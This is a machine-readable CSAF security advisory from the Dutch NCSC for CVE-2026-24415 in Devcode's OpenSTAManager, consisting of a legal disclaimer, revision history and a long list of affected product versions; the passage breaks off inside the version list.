{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-24415",
        "tracking": {
            "current_release_date": "2026-03-23T00:32:26.322918Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-24415",
            "initial_release_date": "2026-03-03T17:53:36.201775Z",
            "revision_history": [
                {
                    "date": "2026-03-03T17:53:36.201775Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T17:53:45.150727Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-03T22:30:57.713822Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T22:31:06.111939Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-03T22:38:39.965021Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T22:38:46.282100Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T02:39:42.958833Z",
                    "number": "7",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-04T07:35:10.064813Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T15:23:02.066939Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-04T15:23:11.806235Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T18:31:50.230324Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (86).| Product Identifiers created (86).| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T18:31:57.650141Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T21:41:34.265608Z",
                    "number": "13",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-05T19:25:25.034823Z",
                    "number": "14",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-05T19:25:34.116726Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-12T09:56:20.119290Z",
                    "number": "16",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (76).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-12T09:56:29.365813Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:52:14.794677Z",
                    "number": "18",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:52:17.522167Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "19"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=2.9.8",
                                "product": {
                                    "name": "vers:unknown/<=2.9.8",
                                    "product_id": "CSAFPID-5585950",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "OpenSTAManager"
                    }
                ],
                "category": "vendor",
                "name": "Devcode"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0",
                                "product": {
                                    "name": "vers:unknown/2.3.0",
                                    "product_id": "CSAFPID-5197969",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@2.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=2.9.8",
                                "product": {
                                    "name": "vers:unknown/<=2.9.8",
                                    "product_id": "CSAFPID-5528647"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.9.8",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.9.8",
                                    "product_id": "CSAFPID-5759021"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3",
                                "product": {
                                    "name": "vers:unknown/v2.3",
                                    "product_id": "CSAFPID-5197750"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3-beta.1",
                                "product": {
                                    "name": "vers:unknown/v2.3-beta.1",
                                    "product_id": "CSAFPID-5197751"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3-beta.2",
                                "product": {
                                    "name": "vers:unknown/v2.3-beta.2",
                                    "product_id": "CSAFPID-5197752"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3.1",
                                "product": {
                                    "name": "vers:unknown/v2.3.1",
                                    "product_id": "CSAFPID-5197753"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4",
                                "product": {
                                    "name": "vers:unknown/v2.4",
                                    "product_id": "CSAFPID-5197754",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.1",
                                "product": {
                                    "name": "vers:unknown/v2.4.1",
                                    "product_id": "CSAFPID-5197755",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.10",
                                "product": {
                                    "name": "vers:unknown/v2.4.10",
                                    "product_id": "CSAFPID-5197756",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.11",
                                "product": {
                                    "name": "vers:unknown/v2.4.11",
                                    "product_id": "CSAFPID-5197757",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.12",
                                "product": {
                                    "name": "vers:unknown/v2.4.12",
                                    "product_id": "CSAFPID-5197758",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.13",
                                "product": {
                                    "name": "vers:unknown/v2.4.13",
                                    "product_id": "CSAFPID-5197759",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.14",
                                "product": {
                                    "name": "vers:unknown/v2.4.14",
                                    "product_id": "CSAFPID-5197760",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.15",
                                "product": {
                                    "name": "vers:unknown/v2.4.15",
                                    "product_id": "CSAFPID-5197761",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.16",
                                "product": {
                                    "name": "vers:unknown/v2.4.16",
                                    "product_id": "CSAFPID-5197762",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.17",
                                "product": {
                                    "name": "vers:unknown/v2.4.17",
                                    "product_id": "CSAFPID-5197763",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.17.1",
                                "product": {
                                    "name": "vers:unknown/v2.4.17.1",
                                    "product_id": "CSAFPID-5197970",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.17.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.18",
                                "product": {
                                    "name": "vers:unknown/v2.4.18",
                                    "product_id": "CSAFPID-5197764",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.19",
                                "product": {
                                    "name": "vers:unknown/v2.4.19",
                                    "product_id": "CSAFPID-5197765",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.2",
                                "product": {
                                    "name": "vers:unknown/v2.4.2",
                                    "product_id": "CSAFPID-5197766",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.20",
                                "product": {
                                    "name": "vers:unknown/v2.4.20",
                                    "product_id": "CSAFPID-5197767",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.21",
                                "product": {
                                    "name": "vers:unknown/v2.4.21",
                                    "product_id": "CSAFPID-5197768",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.22",
                                "product": {
                                    "name": "vers:unknown/v2.4.22",
                                    "product_id": "CSAFPID-5197769",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.23",
                                "product": {
                                    "name": "vers:unknown/v2.4.23",
                                    "product_id": "CSAFPID-5197770",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.24",
                                "product": {
                                    "name": "vers:unknown/v2.4.24",
                                    "product_id": "CSAFPID-3502394",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.25",
                                "product": {
                                    "name": "vers:unknown/v2.4.25",
                                    "product_id": "CSAFPID-3502395",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.25"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.26",
                                "product": {
                                    "name": "vers:unknown/v2.4.26",
                                    "product_id": "CSAFPID-3502396",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.26"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.27",
                                "product": {
                                    "name": "vers:unknown/v2.4.27",
                                    "product_id": "CSAFPID-3502397",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.27"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.28",
                                "product": {
                                    "name": "vers:unknown/v2.4.28",
                                    "product_id": "CSAFPID-3502398",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.28"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.29",
                                "product": {
                                    "name": "vers:unknown/v2.4.29",
                                    "product_id": "CSAFPID-3502399",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.29"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.3",
                                "product": {
                                    "name": "vers:unknown/v2.4.3",
                                    "product_id": "CSAFPID-5197771",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.30",
                                "product": {
                                    "name": "vers:unknown/v2.4.30",
                                    "product_id": "CSAFPID-3502400",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.30"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.31",
                                "product": {
                                    "name": "vers:unknown/v2.4.31",
                                    "product_id": "CSAFPID-3502401",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.31"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.32",
                                "product": {
                                    "name": "vers:unknown/v2.4.32",
                                    "product_id": "CSAFPID-3502402",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.32"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.33",
                                "product": {
                                    "name": "vers:unknown/v2.4.33",
                                    "product_id": "CSAFPID-3502403",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.33"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.34",
                                "product": {
                                    "name": "vers:unknown/v2.4.34",
                                    "product_id": "CSAFPID-3502404",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.34"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.35",
                                "product": {
                                    "name": "vers:unknown/v2.4.35",
                                    "product_id": "CSAFPID-3502405",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.35"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.36",
                                "product": {
                                    "name": "vers:unknown/v2.4.36",
                                    "product_id": "CSAFPID-3502406",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.36"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.37",
                                "product": {
                                    "name": "vers:unknown/v2.4.37",
                                    "product_id": "CSAFPID-3502407",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.37"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.38",
                                "product": {
                                    "name": "vers:unknown/v2.4.38",
                                    "product_id": "CSAFPID-3502408",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.38"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.39",
                                "product": {
                                    "name": "vers:unknown/v2.4.39",
                                    "product_id": "CSAFPID-3502409",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.39"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.4",
                                "product": {
                                    "name": "vers:unknown/v2.4.4",
                                    "product_id": "CSAFPID-5197772",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.40",
                                "product": {
                                    "name": "vers:unknown/v2.4.40",
                                    "product_id": "CSAFPID-3502410",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.40"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.41",
                                "product": {
                                    "name": "vers:unknown/v2.4.41",
                                    "product_id": "CSAFPID-3502411",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.41"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.42",
                                "product": {
                                    "name": "vers:unknown/v2.4.42",
                                    "product_id": "CSAFPID-3502412",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.42"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.43",
                                "product": {
                                    "name": "vers:unknown/v2.4.43",
                                    "product_id": "CSAFPID-3502413",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.43"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.44",
                                "product": {
                                    "name": "vers:unknown/v2.4.44",
                                    "product_id": "CSAFPID-3502414",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.44"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.45",
                                "product": {
                                    "name": "vers:unknown/v2.4.45",
                                    "product_id": "CSAFPID-3502415",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.45"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.46",
                                "product": {
                                    "name": "vers:unknown/v2.4.46",
                                    "product_id": "CSAFPID-3502416",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.46"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.47",
                                "product": {
                                    "name": "vers:unknown/v2.4.47",
                                    "product_id": "CSAFPID-3502417",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.47"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.48",
                                "product": {
                                    "name": "vers:unknown/v2.4.48",
                                    "product_id": "CSAFPID-5197773",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.48"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.49",
                                "product": {
                                    "name": "vers:unknown/v2.4.49",
                                    "product_id": "CSAFPID-5197774",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.49"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.5",
                                "product": {
                                    "name": "vers:unknown/v2.4.5",
                                    "product_id": "CSAFPID-5197775",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.50",
                                "product": {
                                    "name": "vers:unknown/v2.4.50",
                                    "product_id": "CSAFPID-5197776",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.50"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.51",
                                "product": {
                                    "name": "vers:unknown/v2.4.51",
                                    "product_id": "CSAFPID-5197777",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.51"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.52",
                                "product": {
                                    "name": "vers:unknown/v2.4.52",
                                    "product_id": "CSAFPID-5197778",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.52"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.53",
                                "product": {
                                    "name": "vers:unknown/v2.4.53",
                                    "product_id": "CSAFPID-5197779",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.53"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.54",
                                "product": {
                                    "name": "vers:unknown/v2.4.54",
                                    "product_id": "CSAFPID-5197780",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.54"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.6",
                                "product": {
                                    "name": "vers:unknown/v2.4.6",
                                    "product_id": "CSAFPID-5197781",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.7",
                                "product": {
                                    "name": "vers:unknown/v2.4.7",
                                    "product_id": "CSAFPID-5197782",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.8",
                                "product": {
                                    "name": "vers:unknown/v2.4.8",
                                    "product_id": "CSAFPID-5197783",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.4.9",
                                "product": {
                                    "name": "vers:unknown/v2.4.9",
                                    "product_id": "CSAFPID-5197784",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.4.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5",
                                "product": {
                                    "name": "vers:unknown/v2.5",
                                    "product_id": "CSAFPID-5197785",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.1-beta",
                                "product": {
                                    "name": "vers:unknown/v2.5.1-beta",
                                    "product_id": "CSAFPID-5197786",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.1-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.2-beta",
                                "product": {
                                    "name": "vers:unknown/v2.5.2-beta",
                                    "product_id": "CSAFPID-5197787",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.2-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.3",
                                "product": {
                                    "name": "vers:unknown/v2.5.3",
                                    "product_id": "CSAFPID-5197788",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.4",
                                "product": {
                                    "name": "vers:unknown/v2.5.4",
                                    "product_id": "CSAFPID-5197789",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.5",
                                "product": {
                                    "name": "vers:unknown/v2.5.5",
                                    "product_id": "CSAFPID-5197790",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.6",
                                "product": {
                                    "name": "vers:unknown/v2.5.6",
                                    "product_id": "CSAFPID-5197971",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.5.7",
                                "product": {
                                    "name": "vers:unknown/v2.5.7",
                                    "product_id": "CSAFPID-5197972",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.5.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.6-beta",
                                "product": {
                                    "name": "vers:unknown/v2.6-beta",
                                    "product_id": "CSAFPID-5197973",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.6-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.6.1",
                                "product": {
                                    "name": "vers:unknown/v2.6.1",
                                    "product_id": "CSAFPID-5197791",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.6.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.6.2",
                                "product": {
                                    "name": "vers:unknown/v2.6.2",
                                    "product_id": "CSAFPID-5197792",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.6.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.7",
                                "product": {
                                    "name": "vers:unknown/v2.7",
                                    "product_id": "CSAFPID-5197974",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.7-beta",
                                "product": {
                                    "name": "vers:unknown/v2.7-beta",
                                    "product_id": "CSAFPID-5197975",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.7-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.7.1",
                                "product": {
                                    "name": "vers:unknown/v2.7.1",
                                    "product_id": "CSAFPID-5197976",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.7.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.7.2",
                                "product": {
                                    "name": "vers:unknown/v2.7.2",
                                    "product_id": "CSAFPID-5197977",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.7.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.7.3",
                                "product": {
                                    "name": "vers:unknown/v2.7.3",
                                    "product_id": "CSAFPID-5197978",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.7.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.8-beta",
                                "product": {
                                    "name": "vers:unknown/v2.8-beta",
                                    "product_id": "CSAFPID-5197979",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.8-beta"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.8.1",
                                "product": {
                                    "name": "vers:unknown/v2.8.1",
                                    "product_id": "CSAFPID-5197980",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.8.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.8.2",
                                "product": {
                                    "name": "vers:unknown/v2.8.2",
                                    "product_id": "CSAFPID-5197981",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.8.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.8.3",
                                "product": {
                                    "name": "vers:unknown/v2.8.3",
                                    "product_id": "CSAFPID-5197982",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.8.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9",
                                "product": {
                                    "name": "vers:unknown/v2.9",
                                    "product_id": "CSAFPID-5197793",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/devcode-it/openstamanager@v2.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.9-beta",
                                "product": {
                                    "name": "vers:unknown/v2.9-beta",
                                    "product_id": "CSAFPID-5197794",
                                    "product_identification_helper": {
